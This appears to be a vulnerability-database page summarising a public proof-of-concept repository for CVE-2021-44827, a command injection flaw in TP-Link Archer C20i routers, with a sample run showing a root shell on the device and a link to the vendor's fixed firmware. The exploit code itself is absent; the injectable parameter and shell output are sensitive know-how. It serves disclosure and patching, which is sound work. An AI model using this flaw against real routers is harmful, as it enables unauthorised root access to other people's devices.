CVE-2021-44827 PoC — Tp-link Archer C2 操作系统命令注入漏洞

Source

https://github.com/full-disclosure/CVE-2021-44827

Associated Vulnerability

Title:Tp-link Archer C2 操作系统命令注入漏洞 (CVE-2021-44827)
Description:There is remote authenticated OS command injection on TP-Link Archer C20i 0.9.1 3.2 v003a.0 Build 170221 Rel.55462n devices vie the X_TP_ExternalIPv6Address HTTP parameter, allowing a remote attacker to run arbitrary commands on the router with root privileges.

Description

A PoC for CVE-2021-44827 - authenticated remote code execution in Tp-link Archer C20i

Readme

# CVE-2021-44827
A PoC for CVE-2021-44827 - authenticated remote code execution in Tp-link Archer C20i

Write-up: [https://full-disclosure.eu/reports/2022/CVE-2021-44827-tplink-authenticated-remote-code-execution.html](https://full-disclosure.eu/reports/2022/CVE-2021-44827-tplink-authenticated-remote-code-execution.html)

# Example

<pre>
$ python exploit.py
[error]0
[error]0
Run post_exploit_cmd
Trying 192.168.0.1...
Connected to 192.168.0.1
Escape character is '^]'

~ #
~ # ls
web      usr      sbin     mnt      lib      dev
var      sys      proc     linuxrc  etc      bin
~ # id
sh: id: not found
~ # uname -a
sh: uname: not found
~ # cat /proc/version
Linux version 2.6.36 (root@localhost.localdomain) (gcc version 4.6.3 (Buildroot 2012.11.1) ) #1 Tue Feb 21 14:47:04 HKT 2017
</pre>

# Fix

Fixed in [https://static.tp-link.com/upload/firmware/2022/202202/20220217/Archer%20C20i(EU)_V1_220107.zip](https://static.tp-link.com/upload/firmware/2022/202202/20220217/Archer%20C20i(EU)_V1_220107.zip)

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!